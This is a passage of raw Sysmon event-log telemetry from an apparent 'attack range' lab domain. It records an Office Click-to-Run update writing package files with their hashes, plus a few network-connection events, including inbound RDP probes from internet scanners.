Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSPPT.OLBMD5=936677BC08EDE24B20C7BBAADE342F4B,SHA256=0FC4568430A739F6960DE0E9486B8C1A794D121575D8516389B67701F0AF033C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070125Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOUTL.OLBMD5=5863C28E5D5965DF6EADE77E686A2EB1,SHA256=1F4055AA1AB986AAD303AF53D8254BBE0BD0BE990E8C428556D68440E866DA84,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070124Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msoutilstat.etw.manMD5=C1E8B625377C75454266F9D172D2F77D,SHA256=7847E5BA06CA0A834454A3C62EC343DCAA4339E6EF2ED5BD42E460ADE5331628,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070123Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOUC.EXEMD5=3BA9A9882959EBD15F3A7FF17DFB6500,SHA256=259D5B198B8D984F26A98A0D4673522CA9C708DCCB2316669FF767773F777C3F,IMPHASH=6965861DEBEA923B0630228AE2D97831truetrue 23542300x800000000000000070122Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msotelemetry.dllMD5=A8C96671896D8BB79A71021FF4C8FA48,SHA256=0282500ECC3D38F087E65504351F8DE1509B7E66D8285DFCE5E906136B696EB0,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070121Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msotdaddin.dllMD5=06BC4DC37061C049300E69E55747FABC,SHA256=4A8598421330B1DDDFF637BFBA3AD01F1B9D2F33079D8F64BC4A7286B1CBFBFC,IMPHASH=6D0FCD2C39DED532B97D1E83FD3FCB09truetrue 23542300x800000000000000070120Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msotd.exeMD5=BDDB195144CC9F38FD3F82CAF6607B44,SHA256=6865AF48B3DCDC09A9C04707410A5E38D71E6246019B519165551CE614BF403D,IMPHASH=59941493298B9F48DE0F171ECC000F65truetrue 23542300x800000000000000070119Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOSYNC.EXEMD5=47DF3AB3CE52A5F4F70617F14FC55F47,SHA256=1FE9296E9BB17C33FB6C464F6FA4655B3DA79A59EFF6D5DC60EF92CDE7697752,IMPHASH=C0342D73CB8CDE8D903873866D6B83F3truetrue 23542300x800000000000000070118Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOSVG.DLLMD5=D0CF860F26CC252ED99E8AA725C50BCE,SHA256=2CF48B406B8A1895AF6D56C94907B88AD1DCB17E6EA9EDD50ACDE4FC56D60F1A,IMPHASH=1669BE4B02B20BE6826F7CC2031F5C91truetrue 23542300x800000000000000049777Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:32.538{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B2A16510B7FF3D282BDD50299A018AC3,SHA256=41CD171888AE4F7958D8A382EA61C1F2D8A0B525E6371474CC6B260771D94A68,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049776Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:29.803{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52500-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049775Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:29.040{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com55468-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049774Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:28.856{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-64725-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000070246Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONMAIN.DLLMD5=EBFFC97146B02560A54364964107273A,SHA256=17FF07DAB40B9793BF096AF2B219D2F83B2689B2731BA37144ACD7267B53D2F9,IMPHASH=16FE914EFADDB0353B26B6866E28F910truetrue 23542300x800000000000000070245Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONLNTCOMLIB.DLLMD5=FE5844CE1FDF2CD273547C49757552CC,SHA256=7EBD53FEFE4CAA486E7786475457F94752C3DC672A7F6059ED63BFD90505466E,IMPHASH=844970C55FF23D8EDF9C9EEA5DF33705truetrue 23542300x800000000000000070244Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONFILTER.DLLMD5=885F47CDDF10D54ECBDA53A2E8BE5F6B,SHA256=CFCC408696FE464D91A19251947660BE241EF93C166DBE03A46ACE127A35B29F,IMPHASH=E84EF380476A6DD5F8942187F1DA8448truetrue 23542300x800000000000000070243Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONENOTEW32.DLLMD5=B19F9179BDB0C35451C0668B878F2915,SHA256=78A4063638C9183BCBC049366A610CC9AE6A42864F38BBFB0D9496557E87B666,IMPHASH=73F7C8353D3424863E1D1D837A05C706truetrue 23542300x800000000000000070242Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONENOTEM.EXEMD5=13655145E652A1C66F2B9BDCE116AD08,SHA256=1490DF1CFA170C9C8559653CA8E7198F3A00ECA7AF973D1A483CA91FF36C6E1A,IMPHASH=664CFA176C79E7C492D728015EF615BDtruetrue 23542300x800000000000000070241Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONENOTEIMP.DLLMD5=C44645889861DEA0C70F09E11E695797,SHA256=A6EE684A338FB47D91A44A18E2E4024058CFD26589564CAC61BB5619C5AEE9EE,IMPHASH=989C9D12A52C6013CD6F8B6198AEFBC7truetrue 23542300x800000000000000070240Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONENOTE.VisualElementsManifest.xmlMD5=D9E1A8BA2CD88FB785FA830CEC39BBB3,SHA256=2BB3EBF154C29B9B7D9BD2370C0D7DBFC4D83CF66E5978D7125C2C14FFA6ADEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070239Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONENOTE.EXEMD5=B6F7F65D3100ED5A1098AD9353DB32CA,SHA256=3C38B78601E1EB4EB8FEDAF09ED58372200E1FAC13623D2BEBC4905B46ED55D6,IMPHASH=A4F4C0F3E782B96DBCA007EF703BB4DDtruetrue 23542300x800000000000000070238Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONECLIENTW32.DLLMD5=77F8667DD90608BEFEE5478E6C0B1F7B,SHA256=6EE5A64776DEBD72D1E939C1C799205EE3387362BC9314781A9432FC859E1FFC,IMPHASH=649F06A4A8065A035E631BE7D7864D3Ftruetrue 23542300x800000000000000070237Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONBttnWD.dllMD5=D4076A042DC2F0367EF52C77E348302A,SHA256=F23F7A1B4487AE6510F29954DB687D283B49B6C9280C3C7D59E4B54810EC178F,IMPHASH=7548AAC14B8C00DC0A09CEDB2D0AF372truetrue 23542300x800000000000000070236Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONBttnPPT.dllMD5=7EFDEFB9302C6F63A7BB1B92722DF662,SHA256=44894625ADDEAC042DECBBD466BB757245774216F432ADAC4D5D39409A7F4735,IMPHASH=142A01B90EDFB52F3FD91D4140425EC6truetrue 23542300x800000000000000070235Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONBttnOL.dllMD5=4D93BA7914AC04B345F745CFA6BB11FE,SHA256=B6D19D27CA7F382876C37BC380217ECB7B92BCEA16BD44527E50F7935EBEEBFA,IMPHASH=1C15E00496C1BE3EC6D5BF0F80840589truetrue 23542300x800000000000000070234Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONBttnIELinkedNotes.dllMD5=C8FCA0249738856781B79FF4881517BD,SHA256=FC39A5AE52A4E25331A6F6605651C3F00D2D0163B29988DA964AAB2E8967C97C,IMPHASH=7DE028833D4760F7ACC7656B2F4CE5B3truetrue 23542300x800000000000000070233Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONBttnIE.dllMD5=1FB83D9B92921EE1F2D008DF8801D329,SHA256=2F8CCBBD2B11BD01D57868D244B3F86E8DD4913064A9673C4D6596F45652073A,IMPHASH=AE3E2F4DFFAB4C273C8EA51E8B5F7F8Ftruetrue 23542300x800000000000000070232Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OMSXP32.DLLMD5=DCED9DFC5E70F9440AEEC3624504D3EC,SHA256=140E8D0A9AF831415C20C168CC7D3B2C01E0D86437D313B2F5A77BF2C687B3EB,IMPHASH=D6158AA25A9B2A4B3831EEA238928506truetrue 23542300x800000000000000070231Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OMSMAIN.DLLMD5=EFD5894CC6903A37D4CB1E7298D4D4DE,SHA256=33027FD2CCA69BE17F5FD34C03EC0415A09ABD02EB94EFDA353A7BE7D1CD2D24,IMPHASH=FE6EA7EECE4320F88A3D0E81DBD7F3FEtruetrue 23542300x800000000000000070230Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OMRAUT.DLLMD5=6B5B6AE59A21DF87F60315393D3293FE,SHA256=72F30C2442DB798395A2021ED79D0ED09676F7E2704E5E0FAEB50FEBF8EF082E,IMPHASH=9911BBBD2D6AF7D9E67AA7BFB85BD82Etruetrue 23542300x800000000000000070229Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OMML2MML.XSLMD5=7BEAE90DD4EE3015A6E83C46584B0D5A,SHA256=FF1A71843461038E6178885231341E60FA0FEEF94D42FE2CEA94332DDD149DEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070228Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OMICAUT.DLLMD5=1097D1CF21046FD704BD0F1EB5DAECD1,SHA256=E748845C51DDBECE35A7A8F90A5E6E5A502E70C853EBBF0C8203309142656E3B,IMPHASH=06DA0B43AF3E72C5D02195FD9FBA8D97truetrue 23542300x800000000000000070227Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\olReadingPane.jsMD5=178EA573C72E10C60A1B6A8B86607C71,SHA256=8344C44E799351FFEB58EEBACF88B5309F208DFCB06C51A3B3D096C9BE88E5EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070226Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OLMAPI32.DLLMD5=880CF5BA7D375E67849D29760294FA6F,SHA256=89E0388DA49F8197D5B2F7F5AE903322028CD3539775AA7BA48ADA02A7CCC0D3,IMPHASH=4C13E480AAC522332CD833106C1ECFDFtruetrue 23542300x800000000000000070225Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OLKFSTUB.DLLMD5=CB498E105EC2D0273E93C306C3B813DF,SHA256=A5E71ABB0FBF0D6D0D86DB595332A71162AA2512E2224B3D7E813B3429D7FD5B,IMPHASH=9A0D290E775DF3DF70465B9064D5C10Btruetrue 23542300x800000000000000070224Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OLCFG.EXEMD5=0822004392845045046ADE70BA19391F,SHA256=448A773E3B86BD6DE878134D2B69EBB7BD91C8D726C4DAB4750FB6F908C2E41D,IMPHASH=6A82D44523FCB2332DC2AD5C01D11F63truetrue 23542300x800000000000000070223Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OIMG.DLLMD5=9951B5FAE69D8402BCF0409AE0D69E7A,SHA256=09E1AC7A86F70E27AD895106CAA9B89B4F3E7DA034FF475F8874C083F32DDF89,IMPHASH=FEBBB1AD3D7A8A856B837A383234C1D0truetrue 23542300x800000000000000070222Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OFFSYMXL.TTFMD5=50E2608359D97136AC3B0EF3315BC3B1,SHA256=8979513FB0445F517C2BCE1A8A10049EB947D23E1ACE3EA49897805A454483D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070221Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OFFSYMXB.TTFMD5=A4E13A74DB4FFA968FA10967AAAA9688,SHA256=0BD96131CB945316975312F4A86EC3EEA24AF06B19E2EF947F99D317EC5B7B2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070220Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OFFSYMT.TTFMD5=BB6C5DFF6F01C404D3199CEF18221C6C,SHA256=2E9A03508718B983C8C015F89FABC1DB298D5AEAA487BC98997AEBB32EC72A42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070219Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OFFSYMSL.TTFMD5=842B956778BB06860DFF3EB942721936,SHA256=F481D50C009EEC5C34ECA60283F6C99E1ACF3D3AEF63DC6D9336055131ABE575,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070218Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OFFSYMSB.TTFMD5=B91BFE31C517C8FE78D8D620A7D607D1,SHA256=D07CF591F93226E8C16457ACC2CA64EB7606370625DF6B8A830F302CC6C99FEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070217Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OFFSYML.TTFMD5=65AF8DCB86766585AC3324F4A66E401F,SHA256=DC89D77CA4C5192075490840D0D253ED4EF2252A358413B70AA3E341CDF9DD16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070216Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OFFSYMK.TTFMD5=73434F5FECB21ACE0E9E1D5A9301E1C6,SHA256=2AF8973BA87AC71A79227AE231964D7E0E5E9C76F95AD24270B15EB5D61CBEE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070215Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OFFSYMB.TTFMD5=EAD06B1E96235E4ABA09A072E5A4973F,SHA256=3427BED0A0F0299DE47948087E396A4DAEB20C0C0F22400F77EBBF29083FE5E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070214Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OFFSYM.TTFMD5=5FC3482E2756E2FB80DA03DCD2D9287B,SHA256=BF6CC156E9D0D9443655FE741FEBEAD3545167816BB6319A9B7137B1AF8E0A95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070213Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 